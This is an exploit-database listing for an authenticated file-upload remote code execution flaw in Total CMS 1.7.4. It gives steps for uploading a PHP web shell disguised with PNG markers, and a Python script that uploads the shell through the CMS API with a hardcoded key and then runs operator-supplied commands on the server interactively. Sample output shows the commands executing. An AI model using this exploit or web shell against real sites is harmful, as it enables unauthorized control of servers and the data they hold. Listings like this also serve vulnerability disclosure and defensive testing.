Total CMS 1.7.4 Shell Upload

2023-06-17 / 2023-06-18
gb tmrswrr (GB) gb
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Total CMS 1.7.4 - Remote Code Execution (RCE) on File Upload (Authenticated) # Date: 03/06/2023 # Exploit Author: tmrswrr # Version: 1.7.4 # Vendor home page : https://www.totalcms.co/ # Tested Url : https://www.totalcms.co/demo/soccer/ #PLatform : MACOSX 1) Go to this page and click edit page button https://localhost/demo/soccer/ 2)After go down and will you see downloads area 3)Add in this area shell.php file ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND 4) After open this file and write commands https://localhosts/cms-data/depot/cmssoccerdepot/shell.php?cmd=id Result : ?PNG ... uid=996(caddy) gid=998(caddy) groups=998(caddy),33(www-data) IEND Exploit: import requests url = input("Enter the URL: ") urll = url + "/rw_common/plugins/stacks/total-cms/totalapi.php" headers = { 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', 'Accept': 'application/json', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Cache-Control': 'no-cache', 'X-Requested-With': 'XMLHttpRequest', 'Total-Key': '3c79a3226d86c825bc0c4cb0cca05b17', 'Content-Type': 'multipart/form-data; boundary=---------------------------17104855723143716151436432930', 'Origin': urll, 'Dnt': '1', 'Referer': f'{urll}/demo/soccer/admin/', 'Sec-Fetch-Dest': 'empty', 'Sec-Fetch-Mode': 'cors', 'Sec-Fetch-Site': 'same-origin', 'Te': 'trailers', 'Connection': 'close' } data = '''\ -----------------------------17104855723143716151436432930\r\n Content-Disposition: form-data; name="slug"\r\n \r\n cmssoccerdepot\r\n -----------------------------17104855723143716151436432930\r\n Content-Disposition: form-data; name="type"\r\n \r\n depot\r\n -----------------------------17104855723143716151436432930\r\n Content-Disposition: form-data; name="file"; filename="hey.php"\r\n Content-Type: application/x-php\r\n \r\n ?PNG ... <?php echo "<pre>";system($_REQUEST['cmd']);echo "</pre>" ?> IEND\r\n \r\n -----------------------------17104855723143716151436432930--''' while True: command = input("WRITE YOUR COMMAND ('exit' to quit): ") if command.lower() == "exit": break response = requests.post(url, headers=headers, data=data) if response.status_code == 200: shell_path = f'/cms-data/depot/cmssoccerdepot/hey.php?cmd={command}' shell_url = url + shell_path print(shell_url) shell_response = requests.get(shell_url) print(shell_response.text) else: print('Failed to execute the request.')

References:

https://packetstormsecurity.com/files/172687/Total-CMS-1.7.4-Shell-Upload.html
https://www.exploit-db.com/exploits/51500


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top